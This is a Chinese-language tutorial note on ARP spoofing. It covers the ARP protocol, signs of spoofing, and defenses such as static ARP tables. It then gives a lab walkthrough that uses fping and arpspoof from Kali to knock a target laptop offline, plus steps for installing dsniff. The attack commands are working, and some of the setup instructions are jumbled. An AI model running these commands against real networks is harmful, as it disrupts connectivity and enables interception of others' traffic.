ARP地址欺騙
Arp欺騙攻擊
利用ARP協議的缺陷進行的一種非法攻擊
ARP協議
地址解析協議,將IP地址轉換為對應的mac地址,屬鏈路層協議
數據包分為:
請求包(廣播):本機IP地址、mac地址+目標主機IP地址
應答包(單播):本機IP地址、mac地址+來源主機IP地址、mac地址
通信方式:
主機A和主機B通信過程:
ARP欺騙攻擊的檢測與防御
檢測:
1、網絡頻繁掉線
2、網速突然變慢
3、使用arp -a命令查看的網關mac地址與真實的網關mac地址不同
4、使用嗅探軟件發現局域網內存在大量arp應答包
防御:
1、綁定mac地址
2、使用靜態arp緩存表
3、使用arp服務器,通過服務器來查找arp轉換表來響應其他機器的廣播
4、使用arp欺騙防護軟件
ARP欺騙的危害
1、使同一網段內其他用戶無法上網
2、可以嗅探到交換式局域網中的所有數據包
3、對信息進行篡改
4、可以控制局域網內任何主機
ARP地址欺騙攻擊過程
首先准備兩台設備,一台:kail,作為攻擊機。一台:靶機(筆記本電腦)
場景:兩台設備需要在同一個局域網下,網關相同;
第一步:
查看靶機和攻擊機的IP地址:
靶機:ipconfig
攻擊機:ifconfig
第二步:查看相同網段下存活的主機
(如果不知道對方主機IP地址,可以觀察存活主機來判斷對方主機的ip地址)
fping -g 192.168.199.0/24
第三步:發起攻擊
首先在靶機查看是否聯網
ping www.baidu.com
然后在攻擊機上發起攻擊
arpspoof -i eth0 -t 192.168.199.61 192.168.199.1
看到靶機無法上網
然后再到攻擊機上停止攻擊
(Ctrl + Z)
發現靶機恢復正常
找不到命令解決
第一步換源
進入 cd /etc/apt
更換兩個源地址
deb http://archive.ubuntu.com/ubuntu/ trusty main universe restricted multiverse deb-src https://mirrors.aliyun.com/kali kali-rolling main non-free contrib
第二步安裝
輸入arpspoof發現沒有安裝,現在開始安裝
apt-get install dsniff
這時候報錯提示E:有為滿足的依賴關系,請嘗試不指明軟件包的名字.......等等
未安裝成功得原因是有相應的依賴包,這時候可根據提示輸入
apt --fix-broken install
等待安裝跑完輸入
apt-get install dsniff ssldump
第三步檢測
這時輸入arpspoof發現可以出現安裝版本,證明已經安裝成功
輸入apt-get install dsniff,安裝完成后就可用進行arp欺騙,使局域網用戶斷網